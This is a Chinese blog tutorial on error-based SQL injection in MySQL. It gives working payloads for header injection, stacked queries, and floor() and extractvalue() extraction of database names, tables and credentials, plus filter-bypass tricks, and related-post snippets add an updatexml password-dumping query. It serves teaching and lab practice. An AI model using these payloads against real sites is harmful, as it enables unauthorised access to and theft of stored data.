SQL渗透与防御——(四)基于报错注入

已于 2022-03-08 03:12:08 修改
阅读量494 收藏
点赞数
分类专栏: # SQL 文章标签: 数据库 mysql
于 2022-03-06 16:47:23 首次发布
本文博主FisrtBqy。文章内容仅供学习交流,未经允许请勿用于论文写作、竞赛答辩、书刊出版、商业活动等。如有问题请联系作者:FisrtBqy@163.com
本文链接:https://blog.csdn.net/FisrtBqy/article/details/123312725
版权

第四章 基于报错注入

1.User-Agent注入

  • 修改消息头的User-Agent参数

    单引号报错判断
    在这里插入图片描述

  • 推测语句

其源码有可能是insert into tablename value(1,2)

那么就要闭合value()中的右括号a',(select database())) #
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

在这里插入图片描述

2.Stacked queries堆叠注入

#可以执行多条SQL语句
select * from user;select * from user where id=1;
#企业全备
mysqldump -uroot -p sql_inject database_name > /tmp/a.sql
mysqldump -uroot -p -A -R -E --triggers --master-data=2 --single-transaction > full.sql

3.Error-based注入

利用MySQL的逻辑漏洞

常用函数:floor() updatexml() extractvalue()

1.Error-based floor()

rand()返回一个随机数;floor(x)返回一个小于x的整数;count()计数 select count(*),floor(rand(0)*2)x from products group by x;表里的数据要大于3

  • 获取数据库名
1' union select 1,2,3,4,5,count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x #

select count(*) from information_schema.tables group by concat((select version())),floor(rang(0)*2);
#concat 连接字符串功能
#floor  取float的整数值
#rang   取0-1之间随机浮点值
#group by   对结果集进行排序
select verson()就是我们用来做sql注入的语句

在这里插入图片描述
在这里插入图片描述

  • 获取表名
 #第一张表
 #由于结果可能只显示一行,所以用limit函数来逐行显示
 1' union select 1,2,3,4,5,count(*),concat((select table_name from information_schema.`TABlES` where table_schema=database() limit 0,1) ,0x7e,floor(rand(0)*2))x from information_schema.tables group by x #

在这里插入图片描述

  • 获取字段名
  • 获取所需字段的值(用户名/密码)

2.基于Xpath报错

' and extractvalue(1,concat(0x7e,(select database()),0x7e,(select user()))) #

#extractvalue():接收2个参数,第一个xml文档,第二个xpath语句
#用concat构造一个错误的xpath字符串,使extractvalue函数报错,显示出构造的’错误’字符串

在这里插入图片描述

3.混淆和绕过

绕过检测和过滤

  • 混淆注入
 #关键字代换
 or——————>||,and——————>&&,=——————>like
 where id=1——————>limit 0,1
 limit 0,1——————>group by id having id=1
 #大小写转换 
 union——————>UniOn
 #字符串拼接
 union——————>UNunionION	#仅适用于服务端只对字符处理只一次
 #转义
  ——————>%20, ——————>/**/
 union——————>/*!union*/
FisrtBqy
关注
专栏目录
【漏洞挖掘】——121、Xpath注入深入刨析
Fly_鹏程万里
06-28 165
XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5023
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
SQL报错注入
qq_64332865的博客
02-18 606
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
基于报错型的注入
weixin_30386713的博客
07-19 182
一、floor() 、rand()、和 group by 组合: select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x 通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(...
基于报错的注入模式
WYJ____的博客
07-26 602
updatexml函数   基于报错的注入一般bu'z步骤 1.求闭合字符;2.爆数据库名;3.爆表名;4.爆列名;5.爆字段名。     求库名 ?id=1’ and updatexml(1,concat(0x23,database()),1)%23 求表名 ?id=1' and updatexml(1,concat(0x23,(select group_concat(ta...
SQL注入-基于报错的注入
xdjxi的博客
02-18 581
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错的SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错的注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
Error-based基于报错注入
最新发布
weixin_73049307的博客
08-28 840
id=1") and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) -- a中的标记数字就可以了。说明是双引号闭合字符型回显,而且显示出数据库的报错信息,适合使用报错注入。爆出emails,referers,uagents,users表名。爆出emails,referers,uagents,users表。爆出id,username,password列。
渗透测试:sql注入怎么进行报错注入
weixin_45754647的博客
05-20 118
sp:6.3 报错注入: 创建一个表练手: 下面gruop by1 按照第一个字段,分类聚合 由于rand函数的存在,每次执行结果都是不一样的 运行过程: 在这个过程中,由于rand函数会导致表不一样,因此出现重复键冲突 利用报错注入: ...
【安全渗透sql注入
wy233333的博客
04-09 770
目录1. sql 注入1.1 sql 注入 介绍1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 实现方式2. 环境搭建2.1 vmware虚拟机软件2.2 靶机(学习使用项目环境)2.3 渗透机(学习攻击 sql 注入环境)3. sql语句基本操作(mysql为例)3.1 基本 sql 库操作语句3.2 查询语句3.3 联合查询 union3.4 特殊数据库 1. sql...
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2203
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
dvwa——sql注入
qq_45487671的博客
05-26 2644
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
安全/渗透面试过程中遇见的一些——SQL注入问题
chuxuezheerer的博客
04-07 1330
主要是记录一下老师上课的内容。就当作课程笔记吧~
SQL注入之基于报错的注入
weixin_68951704的博客
07-05 1039
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
基于报错的sql注入
qq_44111753的博客
11-21 304
MYSQL中默认有个information schema数据库,用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata:schema_ name字段用来存储数据库名。 tables:table_ schema和table_ name分别用来存储数据库名和表名。 columns:table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM
基于函数报错的注入·
qq_42764906的博客
03-31 295
首先查看是否有漏洞(注:用英文状态下的’否则出不来 用大写锁定也可以) 输入 得到 我们需要做一些处理 否则只会出现一部分 会被吃掉 加~ ~为 0x7e 分别 得到 得到 输入 得到 用limit 从第一个位置开始取limit 0,1 如果是第二个位置limit1,1 以此类推 输入 得到 输入 输入 得到 输入 得到 输入 得到 汇总 ...
基于报错的手工注入
qq_23066945的博客
10-27 502
基于报错的手工注入 实验环境:sqlli 1.首先提示,请输入ID作为参数和数值 2.构建id参数后,返回正常 3.输入转义符 \ ,得到报错信息 “1”) LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号) 由此,我们可以得到大概的SQL语句为 select * from users where id=("1") limit 0,1 尝试闭合单引号,并注释之后的...
sql注入--基于报错的注入
weixin_30568591的博客
04-16 119
这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学院的教程)基于报错的注入,如图,在数据库上测试,产生报错 http://localhost/sqlilabs/Less-5/index.php?id=3' and (select...
SQL注入——基于报错的注入(五)
Gjqhs的博客
02-18 1116
本章目的 普及报错功能函数extractvalue()的用法,演示基于报错的SQL注入基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器及其插件Hackbar、等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DV
浅谈基于报错的手工注入
dzqxwzoe的博客
03-19 364
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
SQL注入攻击详解:基于报错的GET注入技术
内容涵盖了SQL注入的基本分类、GET方式下的报错注入检测与利用,以及如何使用Sqlmap工具进行漏洞测试。" 在网络安全领域,SQL注入是一种常见的攻击手段,攻击者通过输入恶意的SQL代码,欺骗服务器执行非预期的操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值